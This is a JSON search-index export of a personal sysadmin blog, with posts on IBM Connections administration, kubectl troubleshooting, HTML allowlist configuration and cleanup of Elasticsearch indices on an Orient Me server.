target=\"_blank\"\u003eCTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and pentesting. One of the most impressive ones are the \u003ca href=\"https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w\" target=\"_blank\"\u003eLiveOverflow videos \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://liveoverflow.com\" target=\"_blank\"\u003eblogposts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. So when you’re interested in that topic too, just check the links above.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-03-07-linkdump-3-2018/","title":"Linkdump 3/2018"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/pentesting/","title":"Pentesting"},{"body":"And the second linkdump with contents I read that week.\nI don’t like the idea, sounds very 1984: Wi-Fiber is creating safer cities by combining wireless tech, smart streetlights Never tried multi-stage Dockerfiles, but sounds interesting to get red of libraries and installer files: Fun with Multi-stage Dockerfiles Most interesting for me was the part about the available docker images carpedm20/awesome-hacking I use Shaarli to store links (on mobile and my computers), which are not saved to my Readlater stuff in Wallabag, but I will give the console tool Buku a chance next week. Need to check the browser integration and sharing from mobile. jarun/Buku jensvoid/lorg is a tool for advanced HTTPD logfile security analysis and forensics\nQuite nice console extension to see the git status: michaeldfallen/git-radar , I will stay with my plugin for zsh in the moment, but when you haven’t an integration, give it a try.\nInsanely complete Ansible playbook, showing off all the options , really insane how many valuable comments are stored in that Ansible file, great write-up and a ton to learn from this.\nNice blogpost on Five Questions: Testing Ansible Playbooks \u0026amp; Roles Important and quite easy: Validate XML against a XSD with Notepad + + , if you don’t wanna use xmllint, use the integration in notepad + +, so you can find errors in your XML files. I use that to confirm IBM Connections configuration documents against their XSD, to prevent using wsadmin and check them out.\nNext two points, some details on Nginx, Load Balancing and differences to Apache.\nTCP and UDP Load Balancing with Nginx: Tips and Tricks Apache vs Nginx: Practical Considerations ","excerpt":"\u003cp\u003eAnd the second linkdump with contents I read that week.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eI don’t like the idea, sounds very 1984:\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2018/2018-02-18-linkdump-2-2018/","title":"Linkdump 2/2018"},{"body":"I’m not sure how long ago I started following Dirk Deimekes Blog . It must be years, because I found the rss feed address already in my Google reader export.\nFirst of all I need to thank him, it is always a good read and that’s the reason I want to adopt one of his weekly habits – the linkdump . Not sure if I can do that weekly, but will try to post a linkdump of the best articles I read from my wallabag list. It will cover nearly everything I do, so working, IBM, Security and so on.\nVim-Galore is a cool intro and reference to my favorite editor.\nDisable HTTP trace in Apache shows an important point to give the smallest footprint possible.\nHTTPie is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. So if you can’t talk HTTP in telnet, that’s a nice tool.\nDoing your own SSL/TLS testing gives a good intro to the most important parts of SSL security. I like that tool, because you can run it without internet or public accessible host and it gives you more information than nmap ssl-enum-ciphers or Openssl .\nDuring Social Connections 12 in Vienna I showed a starter on ansible to prepare and install software. Here the Best practices to build great Ansible playbooks I do more and more security and forensic things the last years and so I use the tools for troubleshooting and analyze ICS software too. A good tool to record network traffic on servers is tcpdump, which writes pcap and so can be analyzed with Python Scapy or Wireshark . A tcpdump Tutorial and Primer with Examples How “Exit Traps” Can Make Your Bash Scripts Way More Robust And Reliable Containers and microservices get more important each day – 50+ useful Docker tools An interesting write-up on IoT in our houses and flats. Have a look at it and think about if you need a cam which sends your naked butt to a cloud service. The house that spied on me More links: The complete list of Infosec related cheat sheets So that’s the first linkdump. Hope you like it.\n","excerpt":"\u003cp\u003eI’m not sure how long ago I started following\n\u003ca href=\"https://www.deimeke.net/dirk/blog\" target=\"_blank\"\u003eDirk Deimekes Blog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. It must be years,\nbecause I found the rss feed address already in my Google reader export.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-02-11-linkdump-1-2018/","title":"Linkdump 1/2018"},{"body":":icons: font\nAfter some deployments of IBM Connections pink and IBM Cloud private, I want to share some tools, links and hopefully helpful information around these products.\nSources to start with troubleshooting Orientme Blogs: Nico Meisenzahl Socially Integrated IBM Think: Two Wrongs Don’t Make a Right—Troubleshooting IBM Connections IBM Technotes: If Redis is not reachable, Indexing and Analysis tries to reconnect for 8 times and then fails Mongo and Redis Pods in an Unknown State Some shortcuts, commands and tools During my reading and researches, I optimized some of the shown scripts in the above mentioned links. On the other side I hate to open logs in each single pod, so I searched for a better solution.\nGetting the logs of multiple pods On the command line you can just use kubetail . Just download this script to your master node of IBM Cloud private. Move it to the PATH and make executable:\nwget https://raw.githubusercontent.com/johanhaleby/kubetail/master/kubetail sudo mv kubetail /usr/local/bin sudo chmod +x /usr/local/bin/kubetail With kubetail you get log messages in different colors for different pods.\nkubetail es-master -s 15s This shows the logs of the last 15 seconds of all elasticsearch pods and until you hit Ctrl+c you will get all new messages too.\nSet default namespace in CfC/ICP With Orientme 6.0.0.4 the namespace of all pink pods is moved from default to connections. So you need to add the namespace to each kubectl command you run on the console. So I like to change the default namespace for kubectl:\nkubectl config set-context $(kubectl config current-context) --namespace=connections To switch this back to the IBM default use:\nYou need to switch the default namespace back before you update your environment! The update script for 6.0.0.5 will not run properly when you set a different namespace!\nkubectl config set-context $(kubectl config current-context) --namespace=default To check which settings are used:\nkubectl config view Speed up the technote commands Mongo and Redis Pods in an Unknown State Original from Mongo and Redis Pods in an Unknown State kubectl get pods -n connections | grep redis-server kubectl get pods -n connections | grep mongo Or combine the two commands with:\nkubectl get pods -n connections | grep -E \u0026#34;redis-server|mongo\u0026#34; mongo-0 2/2 Unknown 0 19h mongo-1 2/2 Running 0 19h mongo-2 2/2 Running 0 19h redis-server-0 1/1 Running 0 19h redis-server-1 1/1 Unknown 0 19h redis-server-2 1/1 Running 0 19h None of the listed pods should have the state unknown. Resolving that issue:\nkubectl delete pod \u0026lt;pod name=\u0026#34;\u0026#34;\u0026gt; -n connections --grace-period=0 --force\u0026lt;/pod\u0026gt; For example:\nkubectl delete pod mongo-1 -n connections --grace-period=0 --force Or you automate it a little and delete all pods with state Unknown:\nkubectl delete pod $(kubectl get pods -n connections | grep -E \u0026#34;redis-server|mongo\u0026#34; | grep Unknown | awk \u0026#39;{print $1}\u0026#39;) -n connections --grace-period=0 --force Kubernetes will recreate the pod after a short time.\nIf Redis is not reachable, Indexing and Analysis tries to reconnect for 8 times and then fails\nOriginal from If Redis is not reachable, Indexing and Analysis tries to reconnect for 8 times and then fails kubectl get pods -n connections | grep -E \u0026#34;analysisservice|indexingservice\u0026#34; This will return a list of running pods:\nanalysisservice-132048526-bh02z 1/1 Running 4 2d analysisservice-132048526-dhm45 1/1 Running 3 2d indexingservice-3077571376-9b541 1/1 Running 0 3d indexingservice-3077571376-qvq7j 1/1 Running 3 3d indexingservice-3077571376-t61wh 1/1 Running 0 3d Check the logs (use kubetail) of these pods! If you see “Exception while connecting”, delete the pods and kubernetes will recreate them.\n# Show logs of all pods in the default namespace, including last 5 lines of each log kubetail --tail 5 # Show all logs on console and append output to logfile kubetail --tail 5 | tee -a logfile # This will show logs of indexingservice and analysisservice kubetail \u0026#39;(indexingservice|analysisservice)\u0026#39; -e regex -s 30s # Delete all indexingservice and analysisservice pods kubectl delete pod $(kubectl get pods -n connections | grep -E \u0026#34;analysisservice|indexingservice\u0026#34; | awk \u0026#39;{print $1}\u0026#39;) -n connections --grace-period=0 --force So next time I try to get all that directly from the ICP Admin Interface or Elasticsearch.\n","excerpt":"\u003cp\u003e:icons: font\u003c/p\u003e\n\u003cp\u003eAfter some deployments of IBM Connections pink and IBM Cloud private, I\nwant to share some tools, links and hopefully helpful information around\nthese products.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-02-07-troubleshooting-orientme-kubectl/","title":"Troubleshooting Orientme or a little bit kubectl"},{"body":"Here for example embedding a video to a blog post. Prerequist is that you’ve no fear to change some html source.\nUpload the video to the Files application in Connections All blog readers need to have access to the video file Easiest way is to upload to Community files and use it in the Community blog directly in this community Open the file within IBM Connections Docs Viewer and click on ABOUT – Get Links Copy the “Link to download file:” to the clipboard Now create a new blog post (add heading, tags, additional text) Switch to the HTML view in the post On the position where you want to add the video, add following source: \u0026lt;video src=\u0026#34;url from files viewer\u0026#34; controls=\u0026#34;\u0026#34; width=\u0026#34;640px\u0026#34;\u0026gt;\u0026lt;/video\u0026gt; Example: \u0026lt;video src=\u0026#34;https://connections.example.com/files/form/anonymous/api/library/6722626c-b14c-4f4e-80fc-f27f71ad2cb9/document/512adfd2-1d30-4a3d-92ee-13db1f5f0574/media/2018-01-22%20Call%20February%202016.mp4\u0026#34; controls=\u0026#34;\u0026#34; width=\u0026#34;640px\u0026#34; height=\u0026#34;480px\u0026#34;\u0026gt;\u0026lt;/video\u0026gt; Post the document Update Thanks to Urs for the comment, I updated the code so it is valid XHTML now.\n","excerpt":"\u003cp\u003eHere for example embedding a video to a blog post. Prerequist is that\nyou’ve no fear to change some html source.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/2018-02-05-embed-uploaded-videos-to-ibm-connections-blog-post-or-wiki-page/","title":"Embed uploaded videos to IBM Connections blog post or wiki page"},{"body":"So up to IBM Connections 6.0 everything was allowed until it was not excluded in one of the blocklist files. This files are stored within the Deployment Manager profile/config/cells/\u0026lt;cellname\u0026gt;/LotusConnections-config/extern. Now with Connections 6.0CR1 everything is forbidden, until it is enabled in the allowlist. This concept is rolled out for widgets (homepage and communities) and active content. Active content means HTML content too. So everything you or your users add to Connections (blog-posts, wiki pages) gets filtered during the save procedure. This removes all HTML tags and attributes which are not explicitly allowed!\nThe documentation and a tech-note show how to enable Communities and Homepage widgets. Martin Leyrer wrote a blog post on enabling links for IBM Notes through a custom allowlist. After enabling the custom allowlist and enabling notes:// links, I just thought about other topics which are not working as expected in IBM Connections 6.0CR1 and tried to find out if they can be solved with some add-ons to the allowlist.\nWikis TOC 2013 I wrote a blog post on (https://stoeps.de/posts/2013/activate-customize-table-of-contents-macro-in-ibm-connections-wiki/)[customizing the wiki table of contents]. This is still a useful feature and the customization and enablement procedure is working in 6.0CR1 too. I think it’s a important topic, because the post is one of the most read articles in this blog. After deploying IBM Connections 6.0CR1 the automatic update of the TOC is not working anymore. First of all we checked the JavaScript which is used to add the TOC, but the initial creation of a TOC was working, just updating after editing a page not. I created a wiki page, added some headings and a TOC. With the source/html view of the editor we see a div with name=\u0026quot;intInfo\u0026quot;.\n\u0026lt;div style=\u0026#34;border-radius: 6px; margin: 8px; padding: 4px; display: block; width: auto;background-color: #ffc;\u0026#34; name=\u0026#34;intInfo\u0026#34; contenteditable=\u0026#34;false\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt; Table of Contents: \u0026lt;ul style=\u0026#34;list-style-type:none !important;\u0026#34;\u0026gt;...\u0026lt;/ul\u0026gt; \u0026lt;/div\u0026gt; When we now save that page and check the HTML source again, we see that the name attribute and all other styles are vanished.\n\u0026lt;div contenteditable=\u0026#34;false\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt; Table of Contents: \u0026lt;ul\u0026gt;...\u0026lt;/ul\u0026gt; \u0026lt;/div\u0026gt; So the idea was now to add name to the allowlist. I think name is not a tag which can be malicious, so I just added it to the global part of the allowlist.\n\u0026lt;allowattributesglobally\u0026gt; \u0026lt;!-- assumed safe --\u0026gt; \u0026lt;elementAttribute name=\u0026#34;height\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; \u0026lt;elementAttribute name=\u0026#34;width\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; \u0026lt;elementAttribute name=\u0026#34;label\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; \u0026lt;elementAttribute name=\u0026#34;name\u0026#34;\u0026gt;\u0026lt;/elementAttribute\u0026gt; You need to restart your environment to enable the custom whitelist. I added a new TOC and after saving, the name-Attribute was still in the source.\n\u0026lt;div name=\u0026#34;intInfo\u0026#34; contenteditable=\u0026#34;false\u0026#34; dir=\u0026#34;ltr\u0026#34;\u0026gt; Table of Contents: \u0026lt;ul\u0026gt;...\u0026lt;/ul\u0026gt; \u0026lt;/div\u0026gt; So this problem is solved, but we need to get the other styles too.\nEditor formatting I tried some things more. When you add an image with Textbox.io or the CK Editor, you have the option to float that image to the left or right. Like the name attribute before, the img tag contains style=”float:right” which is not saved and the image flips to the left. I played with textbox.io and found that several markups are applied through the style attribute. As far as I can say all these changes gets lost during save, except the font-family. For example font-size and color were not saved. So when users formats their posts it can happen that they loose some of their formatting work. From a security point of view and when I look at corporate identity I like that, but I think we need an option to enable or disable special attributes in the allowlist. And when they are disabled, the editors (textbox and ck editor) must hide them! Maybe it would be an idea to highlight the text parts which contains not-whitelisted markup. I understand all users when they get angry after formatting a page or post and the expected WYSIWYG isn’t working. Or think about importing office documents which was one of the use cases of the first ephox editor, just text will be safe to import.\nAllowing style tag Within the allowlist you can enable attributes for special HTML tags:\n\u0026lt;!--•••\u0026lt;img\u0026gt;•••\u0026lt;image\u0026gt;•••--\u0026gt; \u0026lt;allowAttributesOnElements\u0026gt; \u0026lt;element name=\u0026#34;img\u0026#34; /\u0026gt; \u0026lt;element name=\u0026#34;image\u0026#34; /\u0026gt; \u0026lt;elementAttribute name=\u0026#34;align\u0026#34; /\u0026gt; ... \u0026lt;elementAttribute name=\u0026#34;style\u0026#34; /\u0026gt; ... \u0026lt;elementAttribute name=\u0026#34;lconnwikiparamwikipage\u0026#34; /\u0026gt; With allowed style I tried the float again. Now in the editor HTML view we see \u0026lt;img src... style=\u0026quot;float:right;margin:1 0 0 0;\u0026quot;... \u0026gt; Now this changes to style=\u0026quot;margin 1 0 0 0\u0026quot;, so there are two things to consider. The HTML tag and the attributes within style.\nallowlisting styles? The https://www.ibm.com/support/knowledgecenter/SSYGQH_6.0.0/admin/secure/sec_acf_whitelist_styling.html[allowlist documentation] is a little bit … short and wrong. The documentation shows this snippet\n\u0026lt;allowstyling\u0026gt; \u0026lt;param cssSchema=\u0026#34;css_schema\u0026#34; /\u0026gt; \u0026lt;/allowstyling\u0026gt; And the part of the documentation should help to add css tags and attributes stored in style=... When I added this snippet to the allowlist the first time, I couldn’t open the editor or create a community any more, because of validation errors. So I checked the used xsd of the allowlist and validated with xmllint. I used this command command directly from the extern directory.\nxmllint -schema ojhs-whitelist.xsd ojhs-whitelist-custom.ml --noout After some tries and reading the xsd again, I found the following snippet is valid and should work with any CSS schema, but I’m still not able to add allowed CSS styles. Maybe one of you can help out here.\nValid XML, but still not working \u0026lt;allowstyling\u0026gt; \u0026lt;param value=\u0026#34;float\u0026#34; /\u0026gt; \u0026lt;/allowstyling\u0026gt; Tried that too, but getting Java class errors \u0026lt;allowstyling cssSchema=\u0026#34;CSS 3.0\u0026#34;\u0026gt; \u0026lt;!-- tried several strings here, but without success --\u0026gt; \u0026lt;param value=\u0026#34;float\u0026#34; /\u0026gt; \u0026lt;/allowstyling\u0026gt; Without the cssSchema (tried css3, 3.0 and some more) I get no errors in the log files, but css is still not saved. I hope we can find a way to allow CSS allowlist fine tuning, but until we can do this, I will switch back to old blacklists (in environments which are not public available).\n","excerpt":"\u003cp\u003eSo up to IBM Connections 6.0 everything was allowed until it was not\nexcluded in one of the blocklist files. This files are stored within the\n\u003ccode\u003eDeployment Manager profile/config/cells/\u0026lt;cellname\u0026gt;/LotusConnections-config/extern\u003c/code\u003e.\nNow with Connections 6.0CR1 everything is forbidden, until it is enabled in the allowlist.\nThis concept is rolled out for widgets (homepage and communities) and\nactive content. Active content means HTML content too. So everything you\nor your users add to Connections (blog-posts, wiki pages) gets filtered\nduring the save procedure. This removes all HTML tags and attributes\nwhich are not explicitly allowed!\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/ibm-connections-6-0cr1-allowlisting-css-and-wiki-toc/","title":"IBM Connections 6.0CR1 Allowlisting, CSS and Wiki TOC"},{"body":"IBM Connect Best and Worst Practices for Deploying IBM Connections IBM Connections Adminblast Engage IBM Connections Adminblast Adesso CCTY (Connect Comes to You) Docker in der Praxis – Grundlage für die künftige Infrastruktur der IBM Kollaborationsprodukte IBM Connections 6.0 und IBM Connections pink Social Connections 12 Automate IBM Connections Installations and more ","excerpt":"\u003ch2 id=\"ibm-connect\"\u003eIBM Connect \u003ca href=\"#ibm-connect\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-02-23-bestandworstpracticesfordeployingibmconnections.pdf\" target=\"_blank\"\u003eBest and Worst Practices for Deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-02-23-ibmconnectionsadminblast.pdf\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"engage\"\u003eEngage \u003ca href=\"#engage\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-ibm-connections-adminblast.pdf\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"adesso-ccty-connect-comes-to-you\"\u003eAdesso CCTY (Connect Comes to You) \u003ca href=\"#adesso-ccty-connect-comes-to-you\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-docker1x1withdominoexample.pdf\" target=\"_blank\"\u003eDocker in der Praxis – Grundlage für die künftige Infrastruktur der IBM Kollaborationsprodukte \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-ibmconnections6.pdf\" target=\"_blank\"\u003eIBM Connections 6.0 und IBM Connections pink \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"social-connections-12\"\u003eSocial Connections 12 \u003ca href=\"#social-connections-12\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2017-10-16-ansible4connections.pdf\" target=\"_blank\"\u003eAutomate IBM Connections Installations and more \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2017/","title":"Talks 2017"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-domino/","title":"HCL Domino"},{"body":"During the week we integrated IBM Connections and IBM Docs in our test environment and everything worked fine. Then we moved the configuration to production and most of the stuff was working, like showing Business cards, profile pictures and Connections files to add into mails. Docs Viewer and uploading files from a mail to Connections generated an error: “because of an internal server error”\nI digged into it with Burpsuite and Fiddler4 , in the meantime a customer called me and described the same symptoms. Within the traces I found that the systems which didn’t upload the files had following header set:\nX-IBM-INOTES-NONCE: \u0026lt;none\u0026gt; and the working one had:\nX-IBM-INOTES-NONCE: 2640941AE5454F5853E6732F79E7D2F5 So i searched a little bit on X-IBM-INOTES-NONCE and found that is introduced in Notes/Domino 8.5.2 and shall prevent XSS.\nYou can disable this with iNotes_WA_Security_NonceCheck =0 and this is mentioned in a technote , that sometimes proxies or F5 needs this setting. First we tried that on our testsystems and we seemed to be right, the upload was broken too.\nWe removed the notes.ini entry (or set it to 1) and after a http restart the file upload from VOP and the IBM Viewer worked!\nThanks to Thomas who digged into this with me today.\nUpdate 2017-11-20 IBM released a technote on this. ","excerpt":"\u003cp\u003eDuring the week we integrated IBM Connections and IBM Docs in our test\nenvironment and everything worked fine. Then we moved the configuration\nto production and most of the stuff was working, like showing Business\ncards, profile pictures and Connections files to add into mails. Docs\nViewer and uploading files from a mail to Connections generated an\nerror: “because of an internal server error”\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-11-02-ibm-verse-on-premises-integration-with-connections-and-docs-issue-with-inotes_wa_security_noncecheck/","title":"IBM Verse on Premises Integration with Connections and Docs issue with iNotes\\_WA\\_Security\\_NonceCheck"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/social-connections/","title":"Social Connections"},{"body":"This time Social Connections is hosted in Vienna. The austrian capital is a great place to meet new and old friends. I love the city and the awesome dialect, to listen and practise a little bit, start with the lovely video about the only word you really need to survive in Vienna.\nThe next two days are packed with informations about IBM Connections and I hope to get in touch with the developer team of Pink to see the next planned features. The agenda promises a good mix for all people interested in IBM Connections, developers, administrators and adoption experts can attend and discuss with speakers, IBM developers, product managers and IBM Business partners.\nMy sessions I will do one session with my colleague and mate Nico Meisenzahl about “IBM Connections Admin Blast”. The updated session was born for IBM Connect in February this year and will guide you through around 55 different tips and tasks you should be aware during deploying and administrating IBM Connections and the available addons like Forms/Surveys,Docs and CCM. The session takes place on monday 11:20-12:20 in Breakout 2 (lunch will start around 12:30, so we will take the chance and show all slides without jumping over the last ones and let you have food in time).\nMy other session is a little bit shorter and is completly new. “Automate IBM Connections deployments” on tuesday 9:40-10:10 in Breakout 1. Klaus Bild an I showed some scripts to do the same during Social Connections 7 in Stockholm, but for me these were complicated and updating requirements and new packages were a lot of work. The last months I worked with Ansible , which is a perfect match to do automated installations and configurations. Ansible needs just a ssh connection to the servers you want to configure, no special software clients are needed. Agentless on Linux and with the option to do the same with remote powershell on Microsoft Windows.\nAnsible All important tasks are already built in and so you can install software through the tools of the used Linux (apt, dnf, yum…), change security settings, edit ulimits or service configurtions. Installing all Connections prerequisists (Installation Manager, Websphere Application Server, DB2, IBM Httpserver, TDI and all needed os packages) need about 20 minutes on 4 minimal installed Centos VMs on my Notebook. So you can directly start creating databases, update peopledb and finish the last tasks on Websphere.\nI think adding more scripts does only need a lot of time during scripting and will need a lot of customization from environment to environment.\nWorking with Ansible is fun and not really complicated. Ansible has extensions for container management and the Orientme installer is based on it too. So every admin and developer should have a look at it.\n","excerpt":"\u003cp\u003eThis time \u003ca href=\"http://www.socialconnections.info\" target=\"_blank\"\u003eSocial Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n is\nhosted in Vienna. The austrian capital is a great place to meet new and\nold friends. I love the city and the awesome dialect, to listen and\npractise a little bit, start with the\n\u003ca href=\"https://youtu.be/iuXR53ex4iI\" target=\"_blank\"\u003elovely video \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n about the only word you\nreally need to survive in Vienna.\u003c/p\u003e","ref":"https://stoeps.de/posts/2017/2017-10-15-social-connections-12-in-vienna/","title":"Social Connections 12 in Vienna"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/vienna/","title":"Vienna"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/elk/","title":"ELK"},{"body":"With IBM Connections 6 you can deploy the additional component Orient Me , which provides the first microservices which will build the new IBM Connections pink. Orient Me is installed on top of IBM Spectrum Conductor for Containers (CFC) a new product to help with clustering and orchestrating of the Docker containers.\nKlaus Bild showed in a blog post some weeks ago how to add a container with Kibana to use the deployed Elasticsearch for visualizing the environment.\nI found two issues with the deployed Elasticsearch container, but let me explain from the beginning.\nOn Monday I checked my demo server and the disk was full, so I searched a little bit and found that Elasticsearch is using around 50GB of disk space for the indices. On my server the data path for Elasticsearch is /var/lib/elasticsearch/data. With du -hs /var/lib/* you can check the used space.\nYou will see something like this and I would recommend to create a seperate mount point for /var/lib or two on /var/lib/docker and /var/lib/elasticsearch for your CFC/Orient Me server:\ndu -hs /var/lib/* ... 15G /var/lib/docker 0 /var/lib/docker.20170425072316 6,8G /var/lib/elasticsearch 451M /var/lib/etcd ... So I searched how to show and delete Elasticsearch indices .\nOn your CFC host run:\ncurl localhost:9200/_aliases or\n[root@cfc ~]# curl http://localhost:9200/_aliases?pretty=1 { \u0026#34;logstash-2017.06.01\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;logstash-2017.05.30\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;logstash-2017.05.31\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;.kibana\u0026#34; : { \u0026#34;aliases\u0026#34; : { } }, \u0026#34;heapster-2017.06.01\u0026#34; : { \u0026#34;aliases\u0026#34; : { \u0026#34;heapster-cpu-2017.06.01\u0026#34; : { }, \u0026#34;heapster-filesystem-2017.06.01\u0026#34; : { }, \u0026#34;heapster-general-2017.06.01\u0026#34; : { }, \u0026#34;heapster-memory-2017.06.01\u0026#34; : { }, \u0026#34;heapster-network-2017.06.01\u0026#34; : { } } } } On my first try, the list was “a little bit” longer. So it is a test server, so I just deleted the indices with:\ncurl XDELETE http://localhost:9200/logstash-* curl XDELETE http://localhost:9200/heapster-* For this post, I checked this commands from my local machine and curl XDELETE …​ with IP or hostname are working too! Elasticsearch provides no real security for the index handling, so best practice is to put a Nginx server in front and only allow GET and POST on the URL . So in a production environment, you should think about securing the port 9200 (Nginx, iptables), or anybody could delete the indices. Only logs and performance data, but I don’t want to allow this.\nNow the server was running again and I digged a little bit deeper. So I found that there is a container indices-cleaner running on the server:\n[root@cfc ~]# docker ps | grep clean 6c1a52fe0e0e ibmcom/indices-cleaner:0.1 \u0026#34;cron \u0026amp;\u0026amp; tail -f /...\u0026#34; 51 minutes ago Up 51 minutes k8s_indices-cleaner.a3303a57_k8s-elasticsearch-10.10.10.215_kube-system_62f659ecf9bd14948b6b4ddcf96fb5a3_0b3aeb84 So I checked this container:\ndocker logs 6c1a52fe0e0e shows nothing. Normally it should show us the curator log. The container command is not selected in the best way.\ncron \u0026amp;\u0026amp; tail -f /var/log/curator-cron.log shall show the log file of curator (a tool to delete Elasticsearch indices), but with \u0026amp;\u0026amp; it only starts tail when cron is ended with status true. So that’s the reason that docker logs shows nothing.\nI started a bash in the container with docker exec -it 6c1a52fe0e0e bash and checked the settings there.\ncat /etc/cron.d/curator-cron 59 23 * * * root /bin/bash /clean-indices.sh # An empty line is required at the end of this file for a valid cron file. There is a cronjob which runs each day at 23:59. The started script runs:\n/usr/local/bin/curator --config /etc/curator.yml /action.yml Within the /action.yml the config shows that logstash-* should be deleted after 5 days and heapster-* after 1 day.\nI checked /var/log/curator-cron.log, but it was empty! So the cronjob never ran. To test if the script works as expected, I just started /clean-indices.sh and the log file shows:\ncat /var/log/curator-cron.log 2017-05-31 08:17:01,654 INFO Preparing Action ID: 1, \u0026#34;delete_indices\u0026#34; 2017-05-31 08:17:01,663 INFO Trying Action ID: 1, \u0026#34;delete_indices\u0026#34;: Delete logstash- prefixed indices. Ignore the error if the filter does not result in an actionable list of indices (ignore_empty_list) and exit cleanly. 2017-05-31 08:17:01,797 INFO Deleting selected indices: [u\u0026#39;logstash-2017.05.08\u0026#39;, u\u0026#39;logstash-2017.05.09\u0026#39;, u\u0026#39;logstash-2017.05.03\u0026#39;, u\u0026#39;logstash-2017.04.28\u0026#39;, u\u0026#39;logstash-2017.04.27\u0026#39;, u\u0026#39;logstash-2017.04.26\u0026#39;, u\u0026#39;logstash-2017.05.18\u0026#39;, u\u0026#39;logstash-2017.05.15\u0026#39;, u\u0026#39;logstash-2017.05.12\u0026#39;, u\u0026#39;logstash-2017.05.11\u0026#39;] 2017-05-31 08:17:01,797 INFO ---deleting index 